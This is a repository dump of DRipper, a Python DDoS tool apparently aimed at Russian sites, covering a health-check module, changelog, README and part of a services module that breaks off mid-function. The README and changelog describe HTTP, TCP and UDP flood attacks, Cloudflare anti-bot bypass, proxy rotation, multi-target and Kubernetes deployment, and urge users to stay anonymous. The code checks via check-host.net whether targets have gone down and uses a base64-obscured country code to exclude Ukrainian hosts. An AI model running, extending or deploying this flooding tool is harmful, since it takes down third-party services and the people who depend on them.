ripper.context.events_journal import EventsJournal 14 | from ripper.constants import * 15 | from ripper.headers_provider import HeadersProvider 16 | 17 | # Prepare static patterns once at start. 18 | STATUS_PATTERN = re.compile(r"get_check_results\(\n* *'([^']+)") 19 | 20 | # Forward ref 21 | Target = 'Target' 22 | 23 | events_journal = EventsJournal() 24 | 25 | 26 | def classify_host_status(node_response): 27 | """Classifies the status of the host based on the regional node information from check-host.net.""" 28 | if node_response is None: 29 | return HOST_IN_PROGRESS_STATUS 30 | try: 31 | if not isinstance(node_response, list) or len(node_response) != 1: 32 | return HOST_FAILED_STATUS 33 | value = node_response[0] 34 | # tcp, udp 35 | if isinstance(value, dict): 36 | if 'error' in value: 37 | return HOST_FAILED_STATUS 38 | else: 39 | return HOST_SUCCESS_STATUS 40 | # http 41 | if isinstance(value, list) and len(value) == 5: 42 | return HOST_SUCCESS_STATUS if value[0] == 1 else HOST_FAILED_STATUS 43 | # ping 44 | if isinstance(value, list) and len(value) == 4: 45 | success_cnt = sum([1 if ping[0] == 'OK' else 0 for ping in value]) 46 | return HOST_SUCCESS_STATUS if success_cnt > 1 else HOST_FAILED_STATUS 47 | except: 48 | pass 49 | return None 50 | 51 | 52 | # TODO Autodetect gzip and move to utils 53 | def fetch_zipped_body(url: str) -> str: 54 | """Fetches response body in text of the resource with gzip.""" 55 | headers_provider = HeadersProvider() 56 | http_headers = dict(headers_provider.headers) 57 | http_headers['User-Agent'] = random.choice(headers_provider.user_agents) 58 | compressed_resp = urllib.request.urlopen( 59 | urllib.request.Request(url, headers=http_headers)).read() 60 | return gzip.decompress(compressed_resp).decode('utf8') 61 | 62 | 63 | def classify_host_status_http(val): 64 | """Classifies the status of the host based on the regional node information from check-host.net""" 65 | if val is None: 66 | return HOST_IN_PROGRESS_STATUS 67 | try: 68 | if isinstance(val, list) and len(val) > 0: 69 | if 'error' in val[0]: 70 | return HOST_FAILED_STATUS 71 | else: 72 | return HOST_SUCCESS_STATUS 73 | except: 74 | pass 75 | return None 76 | 77 | 78 | def count_host_statuses(distribution) -> dict[int]: 79 | """Counter of in progress / failed / successful statuses based on nodes from check-host.net.""" 80 | host_statuses = defaultdict(int) 81 | for val in distribution.values(): 82 | status = classify_host_status(val) 83 | host_statuses[status] += 1 84 | return host_statuses 85 | 86 | 87 | class HealthStatus(Enum): 88 | alive = 'alive' 89 | undefined = 'undefined' 90 | dead = 'dead' 91 | start_pending = 'start_pending' 92 | 93 | 94 | class AvailabilityDistribution: 95 | failed: int = None 96 | succeeded: int = None 97 | total: int = None 98 | 99 | def __init__(self, failed: int, succeeded: int, total: int): 100 | self.failed = failed 101 | self.succeeded = succeeded 102 | self.total = total 103 | 104 | @property 105 | def availability_percentage(self): 106 | return round(100 * self.succeeded / self.total) 107 | 108 | 109 | class HealthCheckManager: 110 | """Tracks hosts availability state using check-host.net.""" 111 | headers_provider: HeadersProvider = None 112 | connections_check_time: int 113 | is_in_progress: bool = False 114 | last_host_statuses_update: datetime = None 115 | host_statuses = {} 116 | 117 | is_forbidden: bool = False 118 | """Flag to avoid periodical checks if check-host.net is blocked ours checks.""" 119 | 120 | target: Target = None 121 | _lock: threading.Lock 122 | 123 | def __init__(self, target: Target) -> None: 124 | self._lock = threading.Lock() 125 | self.headers_provider = HeadersProvider() 126 | self.target = target 127 | 128 | @property 129 | def health_check_method(self) -> str: 130 | if self.target.attack_method == 'http-flood': 131 | return 'http' 132 | elif self.target.attack_method == 'tcp-flood': 133 | return 'tcp' 134 | # udp check had false positives, further research is required 135 | # elif self.target.attack_method == 'udp-flood': 136 | # return 'udp' 137 | return 'ping' 138 | 139 | @property 140 | def request_url(self) -> str: 141 | host = f'{self.target.host_ip}:{self.target.port}' 142 | if self.health_check_method == 'http': 143 | # https connection will not be established 144 | # the plain http request will be sent to https port 145 | # in some cases it will lead to false negative 146 | if self.target.port == 443: 147 | host = f'{self.target.host}' 148 | else: 149 | host = f'{self.target.host}:{self.target.port}' 150 | elif self.health_check_method == 'ping': 151 | host = self.target.host_ip 152 | 153 | path = f'/check-{self.health_check_method}' 154 | return f'https://check-host.net{path}?host={host}' 155 | 156 | @property 157 | def is_pending(self) -> bool: 158 | return self.is_in_progress or self.last_host_statuses_update is None or sum(self.host_statuses.values()) < 1 159 | 160 | @property 161 | def availability_distribution(self) -> AvailabilityDistribution: 162 | failed = self.host_statuses[HOST_FAILED_STATUS] if HOST_FAILED_STATUS in self.host_statuses else 0 163 | succeeded = self.host_statuses[HOST_SUCCESS_STATUS] if HOST_SUCCESS_STATUS in self.host_statuses else 0 164 | total = sum(self.host_statuses.values()) 165 | return AvailabilityDistribution( 166 | failed=failed, 167 | succeeded=succeeded, 168 | total=total, 169 | ) 170 | 171 | @property 172 | def status(self) -> HealthStatus: 173 | if self.is_in_progress and not self.last_host_statuses_update: 174 | return HealthStatus.start_pending 175 | avd = self.availability_distribution 176 | if avd.total < 1: 177 | return HealthStatus.undefined 178 | if avd.availability_percentage < MIN_ALIVE_AVAILABILITY_PERCENTAGE: 179 | return HealthStatus.dead 180 | return HealthStatus.alive 181 | 182 | def update_host_statuses(self) -> dict: 183 | """Fetches regional availability statuses.""" 184 | with self._lock: 185 | self.is_in_progress = True 186 | current_host_statuses = {} 187 | try: 188 | body = fetch_zipped_body(self.request_url) 189 | # request_code is some sort of trace_id which is provided on every request to master node 190 | request_code = re.search(STATUS_PATTERN, body)[1] 191 | # it takes time to poll all information from slave nodes 192 | time.sleep(5) 193 | # to prevent loop, do not wait for more than 30 seconds 194 | for _ in range(5): 195 | time.sleep(5) 196 | resp_data = json.loads(fetch_zipped_body(f'https://check-host.net/check_result/{request_code}')) 197 | current_host_statuses = count_host_statuses(resp_data) 198 | if HOST_IN_PROGRESS_STATUS not in current_host_statuses: 199 | break 200 | except HTTPError as http_err: 201 | if http_err.status == 403: 202 | self.is_forbidden = True 203 | events_journal.exception(http_err) 204 | except Exception as ex: 205 | events_journal.exception(ex) 206 | pass 207 | self.is_in_progress = False 208 | self.host_statuses = current_host_statuses 209 | self.last_host_statuses_update = datetime.datetime.now() 210 | return current_host_statuses 211 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Change Log 2 | All notable changes to this project will be documented in this file. 3 | 4 | The format based on [Keep a Changelog](https://keepachangelog.com) 5 | and this project adheres to [Semantic Versioning](https://semver.org). 6 | 7 | ## [Unreleased](https://github.com/alexmon1989/russia_ddos/compare/2.6.3...HEAD) 8 | 9 | 10 | ## [v2.6.3](https://github.com/alexmon1989/russia_ddos/compare/2.6.2...2.6.3) 11 | 12 | ## Changed 13 | - Moved initial checks to attacks to speedup script start 14 | 15 | ### Fixed 16 | - Fixed error with Request lib import 17 | 18 | 19 | ## [v2.6.2](https://github.com/alexmon1989/russia_ddos/compare/2.6.1...2.6.2) 20 | 21 | ### Fixed 22 | - Fixed error with encoding for external resources (targets list) 23 | 24 | 25 | ## [v2.6.1](https://github.com/alexmon1989/russia_ddos/compare/2.6.0...2.6.1) 26 | 27 | ### Fixed 28 | - Fixed timeouts 29 | - Fixed script start logic 30 | 31 | ## [v2.6.0](https://github.com/alexmon1989/russia_ddos/compare/2.5.0...2.6.0) 32 | 33 | ### Added 34 | - Attack duration param (in seconds). After this duration script will stop its execution. 35 | - User guide and setup guide 36 | - Threads count autoscaling. `-t` argument (same as `--threads-count`) now supports **auto**. The auto-scaling method is the default. 37 | - Check minimal required python version 38 | - Attack duration controller. `-d` argument (same as `--duration`) set the attack duration in seconds. After this duration script will stop its execution. 39 | - Targets list support. `--targets-list` argument allows you to use list with targets. List with targets can be path to file or hyperlink. 40 | 41 | ### Changed 42 | - Random bytes optimization (performance improvement) 43 | - Changed CLI arguments for package size management 44 | - Improved speed for new version check 45 | - Improved text messages for better user experience 46 | 47 | ### Fixed 48 | - Fixed command parameter generator to help users with incorrect command line parameters or errors with parameters 49 | - Test UDP connection for UDP scheme if TCP did not work 50 | 51 | 52 | ## [v2.5.0](https://github.com/alexmon1989/russia_ddos/compare/2.4.0...2.5.0) 53 | 54 | ### Added 55 | - Check DRipper updates from GitHub tags and show notification to user about it. 56 | - Added check for anti-DDoS page protection for check-host.net service. 57 | - Script command parameter generator to help users with incorrect command line parameters or errors with parameters 58 | 59 | ### Changed 60 | - Changed multiple target argument pass. Targets should be passed separately with `-s` flag. 61 | - Moved target specific validation from statistic and context to Target class 62 | - Targets manager can allocate attacks after target is removed and encapsulates logic related to the targets collection management. 63 | 64 | 65 | ## [v2.4.0](https://github.com/alexmon1989/russia_ddos/compare/2.3.1...2.4.0) 66 | 67 | ### Added 68 | - Added support for multiple targets. Multiple target should be passed as sting with ',' as delimiter 69 | - Threads are distributed uniformly between targets. 70 | - Irresponsive targets and their threads die in runtime. 71 | - Added support for the log-level argument. 72 | 73 | ### Changed 74 | - Target-related stats are represented on pages. Pages are rotated automatically in 5 seconds intervals. 75 | - Refactored stats representation. Isolated target-related details builder. 76 | - Isolated time interval manager. 77 | - Improved error messages and description about error when validates input arguments. 78 | 79 | ### Fixed 80 | - Fixed CloudFlare detection logic. 81 | 82 | 83 | ## [v2.3.1](https://github.com/alexmon1989/russia_ddos/compare/2.3.0...2.3.1) 84 | 85 | ### Fixed 86 | - Fixed setup script and Docker builds 87 | 88 | 89 | ## [v2.3.0](https://github.com/alexmon1989/russia_ddos/compare/2.2.0...2.3.0) 90 | 91 | ### Added 92 | - `dry run` mode for fast testing purposes 93 | - CloudFlare bypass mode for HTTP flood method 94 | - Events log that helps to understand attack process details in depth 95 | - `--log-size` parameter to configure Events log history frame length 96 | 97 | ### Fixed 98 | - Fixed error with keyboard interrupting and threads shutdown process 99 | - Reduced IP address re-checks to avoid redundant API calls 100 | - Attack checks methods, improved speed 101 | - Rendering table with statistic does not re-render table caption with logo 102 | 103 | ### Changed 104 | - Isolated target. The target contains a full server description, statistics, and health check. It is an intermediate step towards multiple targets. 105 | - Formalized attack_method, added names and labels for attacks. 106 | - Isolated assets. 107 | - Split context on components. 108 | - Changed health check to be target-dependant. 109 | - Reduced awareness about the entire context structure. 110 | - Unified tests format. Classes should represent "Describe" blocks, and test methods should start with "it." 111 | - Changed Exception handling and logging process. 112 | - Replaced Error class with Events 113 | 114 | 115 | ## [v2.2.0](https://github.com/alexmon1989/russia_ddos/compare/2.1.0...2.2.0) 116 | 117 | ### Added 118 | - Command line Option `--version` to get the current version of script 119 | - Added support for HTTP and SOCKS4 proxy. 120 | - Added the possibility to read proxies from HTTP/HTTPS location. It helps to organize multiple peers. 121 | 122 | ### Changed 123 | - UDP/TCP/HTTP attack methods internals 124 | - HTTP Status code check method now support periodical check 125 | - Improved performance for HTTP flood 126 | 127 | 128 | ## [v2.1.0](https://github.com/alexmon1989/russia_ddos/compare/2.0.4...2.1.0) 129 | 130 | 131 | ### Added 132 | - Added support for SOCKS5 proxies. (HTTP/TCP only) 133 | - Added possibility to dismiss health check. It is helpful during development. 134 | - Added the possibility to attack random extra_data for HTTP attack (turned off by default). 135 | - Added build tools to create `dripper` executable for Windows/Linux/macOS 136 | 137 | ### Fixed 138 | - Fixed proxy list params read 139 | 140 | ### Changed 141 | - Reworked Error log for Statistic 142 | 143 | 144 | ## [v2.0.4](https://github.com/alexmon1989/russia_ddos/compare/2.0.3...2.0.4) 145 | 146 | ### Changed 147 | - Moved options parser to separate module 148 | - Simplified health check logic 149 | - Improved script start time 150 | 151 | 152 | ## [v2.0.3](https://github.com/alexmon1989/russia_ddos/compare/2.0.3...2.0.3) 153 | 154 | ### Fixed 155 | - Fixed vertical scrolling issue 156 | - Fixed live refresh for Statistic 157 | 158 | 159 | ## [v2.0.2](https://github.com/alexmon1989/russia_ddos/compare/2.0.1...2.0.2) 160 | 161 | ### Fixed 162 | - Fixed bug with missed property for Packets statistic [#37](https://github.com/alexmon1989/russia_ddos/issues/37) 163 | 164 | 165 | ## [v2.0.1](https://github.com/alexmon1989/russia_ddos/compare/2.0.0...2.0.1) 166 | 167 | ### Fixed 168 | - Fixed bug with missed property for Packets statistic [#37](https://github.com/alexmon1989/russia_ddos/issues/37) 169 | 170 | 171 | ## [v2.0.0](https://github.com/alexmon1989/russia_ddos/compare/1.3.9...2.0.0) 172 | 173 | ### Changed 174 | - Simplified logic 175 | - Reworked statistic 176 | - Other code improvements 177 | 178 | ### Fixed 179 | - Fixed several bugs 180 | 181 | 182 | ## [v1.3.9](https://github.com/alexmon1989/russia_ddos/compare/1.3.8...1.3.9) 183 | 184 | ### Added 185 | - Added country detection and displaying in Statistic 186 | 187 | ### Changed 188 | - Optimized UDP attack 189 | - Minor improvements 190 | 191 | 192 | ## [v1.3.8](https://github.com/alexmon1989/russia_ddos/compare/1.3.7...1.3.8) 193 | 194 | ### Added 195 | - Added CloudFlare detection 196 | - Added support for cross-platform colored CLI output 197 | 198 | ### Changed 199 | - Improved performance 200 | - Improved UI 201 | 202 | ### Fixed 203 | - Fixed several bugs 204 | 205 | 206 | ## [v1.3.7](https://github.com/alexmon1989/russia_ddos/compare/1.3.6...1.3.7) 207 | 208 | ### Fixed 209 | - Fixed several bugs 210 | 211 | 212 | ## [v1.3.6](https://github.com/alexmon1989/russia_ddos/compare/1.3.5...1.3.6) 213 | 214 | ### Added 215 | - Added version displaying in header 216 | - Added Python 3.8 support 217 | 218 | ### Fixed 219 | - Fixed several bugs 220 | 221 | 222 | ## [v1.3.5](https://github.com/alexmon1989/russia_ddos/compare/1.3.4...1.3.5) 223 | 224 | ### Added 225 | - Added TCP flood 226 | 227 | ### Fixed 228 | - Fixed check connection 229 | 230 | 231 | ## [v1.3.4](https://github.com/alexmon1989/russia_ddos/compare/1.3.1...1.3.4) 232 | 233 | ### Added 234 | - Added ARM support for Docker builds 235 | 236 | 237 | ## [v1.3.1](https://github.com/alexmon1989/russia_ddos/compare/1.3.0...1.3.1) 238 | 239 | ### Added 240 | - Added validation 241 | 242 | 243 | ## [v1.3.0](https://github.com/alexmon1989/russia_ddos/compare/1.1.0...1.3.0) 244 | 245 | ### Changed 246 | - Improved logging 247 | 248 | ### Fixed 249 | - Fixed IndexOutOfBound Exception 250 | 251 | 252 | ## [v1.1.0](https://github.com/alexmon1989/russia_ddos/compare/1.1.0...1.1.0) 253 | 254 | ### Changed 255 | - Changed UI 256 | - Improved speed 257 | 258 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DRipper 2 | 3 | [![Build status][actions build badge]][actions build link] 4 | [![Docker Pulls][docker pulls badge]][docker pulls link] 5 | [![Docker Image Version (latest semver)][dockerhub badge]][dockerhub link] 6 | [![License: MIT][license badge]][license link] 7 | 8 | DESCRIPTION 9 | ----------- 10 | 11 | This is reworked version of [DRipper](https://gist.github.com/scamp/33807688d0ebdcfbd4c29a4b992a8b54). 12 | This script support HTTP/TCP/UDP flood attack. We recommend using this script for your own test purposes in the local (on-premise) environment to improve your own web services against DDoS attacks. 13 | 14 | ## Prerequisites 15 | 16 | - Python 3.9 or higher 17 | - Docker (optional) if you'd like to run script with docker 18 | 19 | ## Features 20 | 21 | ### Attacks 22 | 23 | - HTTP Flood - OSI Layer 7 method volumetric attack type 24 | - HTTP Bypass - OSI Layer 7 method volumetric attack type with to bypass Cloudflare's anti-bot page (also known as "I'm Under Attack Mode", or IUAM) 25 | - TCP Flood - OSI Layer 4 method volumetric attack type 26 | - UDP Flood - OSI Layer 4 method volumetric attack type 27 | 28 | ### Other features 29 | 30 | - Multiple targets support - the script can attack multiple targets at the same time 31 | - Detailed statistics with deep attack log for better attack analysis during the attack 32 | - Display average request rate and throughput 33 | - Periodic checks of your public IP address to ensure your privacy and VPN connection survivability. 34 | - Automatic and periodic checks for the availability of the attacked host 35 | - Distributed statistics of the response code for the attacked host, which helps you to understand the effectiveness of attacks 36 | - Detection of redirects and rate limits with alerts in the event log 37 | 38 | ## How it looks 39 | 40 | ```bash 41 | ───────────────────────────────────────── Starting DRipper ───────────────────────────────────────── 42 | [23:17:39] (1/3) tcp://www.site1.ru:80/ (192.168.0.101:80) Trying to connect... services.py:135 43 | (1/3) tcp://www.site1.ru:80/ (192.168.0.101:80) Connected services.py:138 44 | (1/3) https://www.site2.ru:443/ (192.168.0.102:443) Trying to connect... services.py:135 45 | (1/3) https://www.site2.ru:443/ (192.168.0.102:443) Connected services.py:138 46 | ──────────────────────────────────────────────────────────────────────────────────────────────────── 47 | 48 | 49 | ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗ 50 | ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║ 51 | ██║ ██║██████╔╝██║██████╔╝██████╔╝█████╗ ██████╔╝ 52 | ██║ ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝ ██╔══██╗ 53 | ██████╔╝██║ ██║██║██║ ██║ ███████╗██║ ██║ 54 | ╚═════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ 55 | v2.5.0 56 | 57 | It is the end user's responsibility to obey all applicable laws. 58 | It is just like a server testing script and Your IP is visible. 59 | Please, make sure you are ANONYMOUS! 60 | 61 | https://github.com/alexmon1989/russia_ddos 62 | 63 | 64 | ────────────────────────────────────────────────────────────────────────────────────────────────── 65 | Description Status 66 | ────────────────────────────────────────────────────────────────────────────────────────────────── 67 | Start Time, Duration 2022-04-08 23:17:29 (0:00:14) 68 | Your Country, Public IP DK 45.***.***.*** 69 | Total Threads 200 70 | vCPU Count 8 71 | Socket Timeout (seconds) 1 72 | ────────────────────────────────────────────────────────────────────────────────────────────────── 73 | Target (tcp://www.site1.ru:80/) 1/2 (next in 1) 74 | ────────────────────────────────────────────────────────────────────────────────────────────────── 75 | Country, Host IP RU 192.168.0.101:80 (target-0) 76 | Attack Method TCP-FLOOD 77 | Random Packet Length (bytes) From 1 to 1024 78 | Threads 100 79 | CloudFlare Protection Not protected 80 | Availability (check-host.net) ...detecting (TCP method) 81 | Sent Bytes @ AVG speed 1.73 MB @ 119.76 kB/s 82 | Sent Packets @ AVG speed 3,531 @ 238 packets/s 83 | Connections success: 100, failed: 0, success rate: 100 % 84 | ────────────────────────────────────────────────────────────────────────────────────────────────── 85 | 86 | Events Log 87 | ────────────────────────────────────────────────────────────────────────────────────────────────── 88 | [23:17:40] info target-0 thread-14 Creating new TCP connection... 89 | [23:17:40] info target-0 thread-114 Creating new TCP connection... 90 | [23:17:40] info target-0 thread-16 Creating new TCP connection... 91 | [23:17:40] info target-0 thread-20 Creating new TCP connection... 92 | [23:17:40] info target-0 thread-22 Creating new TCP connection... 93 | 94 | Press CTRL+C to interrupt process. 95 | 96 | #StandWithUkraine 97 | ``` 98 | 99 | ## Usage 100 | 101 | DRipper can run on Windows/Linux/macOS from command line. 102 | We recommend to use `PowerShell` for Windows users to run the script, Linux/macOS users can use any shell. 103 | 104 | Run `dripper --help` to see detailed params description. 105 | 106 | ```bash 107 | Usage: DRipper.py [options] arg 108 | 109 | Options: 110 | --version show program's version number and exit 111 | -h, --help show this help message and exit 112 | -s TARGETS, --targets=TARGETS Attack target in {scheme}://{hostname}[:{port}][{path}] format. 113 | Multiple targets allowed. 114 | -m ATTACK_METHOD, --method=ATTACK_METHOD Attack method: udp-flood, tcp-flood, http-flood, http-bypass 115 | -e HTTP_METHOD, --http-method=HTTP_METHOD HTTP method. Default: GET 116 | -t THREADS_COUNT, --threads=THREADS_COUNT Total threads count. Default: 100 117 | --min-random-packet-len=MIN_RANDOM_PACKET_LEN 118 | Min random packets length. Default: 1 for udp/tcp 119 | -l MAX_RANDOM_PACKET_LEN, --max-random_packet-len=MAX_RANDOM_PACKET_LEN 120 | Max random packets length. Default: 1024 for udp/tcp 121 | -y PROXY_LIST, --proxy-list=PROXY_LIST File (fs or http/https) with proxies in 122 | ip:port:username:password line format. Proxies will be ignored 123 | in udp attack! 124 | -k PROXY_TYPE, --proxy-type=PROXY_TYPE Type of proxy to work with. Supported types: socks5, socks4, 125 | http. Default: socks5 126 | -c HEALTH_CHECK, --health-check=HEALTH_CHECK Controls health check availability. Turn on: 1, turn off: 0. 127 | Default: 1 128 | -o SOCKET_TIMEOUT, --socket-timeout=SOCKET_TIMEOUT Timeout for socket connection is seconds. Default (seconds): 1 129 | without proxy, 2 with proxy 130 | --dry-run Print formatted output without full script running. 131 | --log-size=LOG_SIZE Set the Events Log history frame length. 132 | --log-level=EVENT_LEVEL Log level for events board. Supported levels: info, warn, error, 133 | none. 134 | -d DURATION_SECONDS, --duration=DURATION_SECONDS Attack duration in seconds. After this duration script will 135 | stop its execution. 136 | 137 | Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80 138 | ``` 139 | 140 | ## How to Run 141 | 142 | #### Using Docker 143 | 144 | ```bash 145 | # HTTP flood 146 | docker run -it --rm alexmon1989/dripper:latest -t 100 -m http-flood -s http://127.0.0.1:80 147 | # or 148 | docker run -it --rm alexmon1989/dripper:latest -t 100 -s http://127.0.0.1:80 149 | # or even 150 | docker run -it --rm alexmon1989/dripper:latest -s http://127.0.0.1 151 | 152 | # TCP flood 153 | docker run -it --rm alexmon1989/dripper:latest -t 100 -l 2048 -s tcp://127.0.0.1:80 154 | 155 | # UDP flood 156 | docker run -it --rm alexmon1989/dripper:latest -t 100 -l 2048 -s udp://127.0.0.1:80 157 | ``` 158 | 159 | #### Directly with Python. 160 | 161 | Ensure you have Python 3.9 or better installed. Then clone this repo and run DRipper.py with params you need 162 | 163 | ```bash 164 | git clone https://github.com/alexmon1989/russia_ddos.git 165 | cd russia_ddos 166 | 167 | # Install dependencies 168 | python3 -m pip install --upgrade pip git+https://github.com/alexmon1989/russia_ddos.git 169 | # Run script 170 | dripper -t 100 -s udp://127.0.0.1:80 171 | 172 | 173 | # ===== Alternative variant ===== 174 | 175 | # Install python dependencies: 176 | pip install -r requirements.txt 177 | # Run script 178 | python3 DRipper.py -t 100 -s udp://127.0.0.1:80 179 | ``` 180 | 181 | #### Kubernetes 182 | 183 | You can deploy and run DRipper in Kubernetes cluster using [kube-dripper][kube-dripper-link] terraform configuration. 184 | For details - see the [README][kube-dripper-readme] from **kube-dripper** project. 185 | 186 | ## How to run unit tests 187 | 188 | #### Prepare 189 | ```bash 190 | pip install -r requirements.test.txt 191 | ``` 192 | 193 | #### Run 194 | ```bash 195 | pytest 196 | 197 | # with code coverage report: 198 | pytest --cov-report=html:./htmlcov 199 | ``` 200 | 201 | # License 202 | 203 | This project is distributed under the MIT License, see [LICENSE](./LICENSE) for more information. 204 | 205 | 206 | [actions build badge]: https://github.com/alexmon1989/russia_ddos/actions/workflows/build.yml/badge.svg 207 | [actions build link]: https://github.com/alexmon1989/russia_ddos/actions/workflows/build.yml 208 | 209 | [docker pulls link]: https://hub.docker.com/r/alexmon1989/dripper 210 | [docker pulls badge]: https://img.shields.io/docker/pulls/alexmon1989/dripper 211 | [dockerhub link]: https://hub.docker.com/r/alexmon1989/dripper/tags 212 | [dockerhub badge]: https://img.shields.io/docker/v/alexmon1989/dripper?label=DockerHub 213 | 214 | [kube-dripper-link]: https://github.com/denismakogon/kube-dripper 215 | [kube-dripper-readme]: https://github.com/denismakogon/kube-dripper/blob/main/README.md 216 | 217 | [license badge]: https://img.shields.io/badge/License-MIT-yellow.svg 218 | [license link]: ./LICENSE 219 | -------------------------------------------------------------------------------- /ripper/services.py: -------------------------------------------------------------------------------- 1 | # XXX Services look unstructured 2 | import signal 3 | import sys 4 | import threading 5 | import time 6 | from base64 import b64decode 7 | from rich import box 8 | from rich.console import Console 9 | from rich.panel import Panel 10 | from rich.live import Live 11 | 12 | from _version import __version__ 13 | from ripper.github_updates_checker import GithubUpdatesChecker 14 | from ripper import common, arg_parser 15 | from ripper.actions.attack import attack_method_labels 16 | from ripper.constants import * 17 | from ripper.context.context import Context, Target 18 | from ripper.common import get_current_ip, generate_random_bytes 19 | from ripper.context.events_journal import EventsJournal 20 | from ripper.health_check_manager import HealthStatus 21 | from ripper.proxy import Proxy 22 | 23 | exit_event = threading.Event() 24 | events_journal = EventsJournal() 25 | 26 | 27 | ############################################### 28 | # Target-only 29 | ############################################### 30 | def update_host_statuses(target: Target): 31 | """Updates host statuses based on check-host.net nodes.""" 32 | if target.health_check_manager.is_forbidden: # Do not check health status when service blocking your IP 33 | return 34 | 35 | if target.health_check_manager.is_in_progress or not target.time_interval_manager.check_timer_elapsed( 36 | bucket=f'update_host_statuses_{target.uri}', sec=MIN_UPDATE_HOST_STATUSES_TIMEOUT): 37 | return 38 | 39 | if target.host_ip: 40 | if target.health_check_manager.update_host_statuses() == {}: 41 | events_journal.error(f'Host statuses update failed with check-host.net', target=target) 42 | else: 43 | events_journal.info(f'Host statuses updated with check-host.net', target=target) 44 | 45 | 46 | ############################################### 47 | # Context-only 48 | ############################################### 49 | # TODO use context as an argument name 50 | def update_current_ip(_ctx: Context, check_period_sec: int = 0) -> None: 51 | """Updates current IPv4 address.""" 52 | if _ctx.time_interval_manager.check_timer_elapsed(check_period_sec, 'update_current_ip'): 53 | events_journal.info(f'Checking my public IP address (period: {check_period_sec} sec)') 54 | _ctx.myIpInfo.current_ip = get_current_ip() 55 | if _ctx.myIpInfo.start_ip is None: 56 | _ctx.myIpInfo.start_ip = _ctx.myIpInfo.current_ip 57 | 58 | 59 | def go_home(_ctx: Context) -> None: 60 | """Modifies host to match the rules.""" 61 | home_code = b64decode('dWE=').decode('utf-8') 62 | for target in _ctx.targets_manager.targets: 63 | if target.host.endswith('.' + home_code.lower()) or common.get_country_by_ipv4(target.host_ip) in home_code.upper(): 64 | target.host_ip = target.host = 'localhost' 65 | target.host += '*' 66 | 67 | 68 | def refresh_context_details(_ctx: Context) -> None: 69 | """Check threads, IPs, VPN status, etc.""" 70 | 71 | with threading.Lock(): 72 | threading.Thread( 73 | name='update-ip', target=update_current_ip, 74 | args=[_ctx, UPDATE_CURRENT_IP_CHECK_PERIOD_SEC], daemon=True).start() 75 | 76 | if _ctx.is_health_check: 77 | for target in _ctx.targets_manager.targets: 78 | threading.Thread( 79 | name='check-host', target=update_host_statuses, 80 | args=[target], daemon=True).start() 81 | 82 | if _ctx.myIpInfo.country == GEOIP_NOT_DEFINED: 83 | threading.Thread( 84 | name='upd-country', target=common.get_country_by_ipv4, 85 | args=[_ctx.myIpInfo.current_ip], daemon=True).start() 86 | 87 | for target in _ctx.targets_manager.targets: 88 | if target.country == GEOIP_NOT_DEFINED: 89 | threading.Thread( 90 | name='upd-country', target=common.get_country_by_ipv4, 91 | args=[target.host_ip], daemon=True).start() 92 | 93 | # Check for my IPv4 wasn't changed (if no proxylist only) 94 | if _ctx.proxy_manager.proxy_list_initial_len == 0 and _ctx.myIpInfo.is_ip_changed(): 95 | events_journal.error(YOUR_IP_WAS_CHANGED_ERR_MSG) 96 | 97 | for target in _ctx.targets_manager.targets[:]: 98 | if not target.validate_connection(): 99 | events_journal.error(NO_CONNECTIONS_ERR_MSG, target=target) 100 | _ctx.targets_manager.delete_target(target) 101 | if target.health_check_manager.status == HealthStatus.dead: 102 | events_journal.error(TARGET_DEAD_ERR_MSG, target=target) 103 | _ctx.targets_manager.delete_target(target) 104 | if _ctx.targets_manager.targets_count() < 1: 105 | _ctx.logger.log(NO_MORE_TARGETS_LEFT_ERR_MSG) 106 | exit(1) 107 | 108 | if _ctx.proxy_manager.proxy_list_initial_len > 0 and len(_ctx.proxy_manager.proxy_list) == 0: 109 | events_journal.error(NO_MORE_PROXIES_ERR_MSG) 110 | _ctx.logger.log(NO_MORE_PROXIES_ERR_MSG) 111 | exit(1) 112 | 113 | 114 | ############################################### 115 | # Target+Context 116 | ############################################### 117 | def connect_host(target: Target, _ctx: Context, proxy: Proxy = None): 118 | """Check connection to Host before start script.""" 119 | target.stats.connect.set_state_in_progress() 120 | try: 121 | with _ctx.sock_manager.create_tcp_socket(proxy) as http_socket: 122 | http_socket.connect(target.hostip_port_tuple()) 123 | except Exception as e: 124 | if target.scheme == 'udp': 125 | with _ctx.sock_manager.create_udp_socket() as udp_socket: 126 | send_bytes = generate_random_bytes(1, 100) 127 | udp_socket.sendto(send_bytes, target.hostip_port_tuple()) 128 | udp_socket.recvfrom(100) 129 | else: 130 | raise e 131 | finally: 132 | target.stats.connect.set_state_is_connected() 133 | 134 | 135 | def connect_host_loop(target: Target, _ctx: Context, retry_cnt: int = CONNECT_TO_HOST_MAX_RETRY) -> bool: 136 | """Tries to connect host in permanent loop.""" 137 | i = 0 138 | (host_ip, port) = target.hostip_port_tuple() 139 | if not host_ip: 140 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target.uri} Target\'s host ip wasn\'t detected...') 141 | return False 142 | 143 | target_uri_extended = f'{target.uri} ({host_ip}:{port})' 144 | while i < retry_cnt and not target.stats.connect.is_connected: 145 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target_uri_extended} Trying to connect...') 146 | try: 147 | connect_host(target=target, _ctx=_ctx) 148 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target_uri_extended} [green]Connected[/]') 149 | return True 150 | except Exception as e: 151 | _ctx.logger.log(f'({i + 1}/{retry_cnt}) {target_uri_extended} [red]{e}[/]') 152 | i += 1 153 | return False 154 | 155 | 156 | ############################################### 157 | # Console 158 | ############################################### 159 | def generate_valid_commands(uri): 160 | tcp_uri = http_uri = udp_uri = '' 161 | for t in uri: 162 | hostname = t.split(':') 163 | port = f':{hostname[2]}' if len(hostname) == 3 else '' 164 | udp_uri += f' -s udp:{hostname[1]}{port}' 165 | tcp_uri += f' -s tcp:{hostname[1]}{port}' 166 | http_uri += f' -s http:{hostname[1]}{port}' 167 | 168 | tcp_attack = f'-t {ARGS_DEFAULT_THREADS_COUNT} {tcp_uri}' 169 | udp_attack = f'-t {ARGS_DEFAULT_THREADS_COUNT} 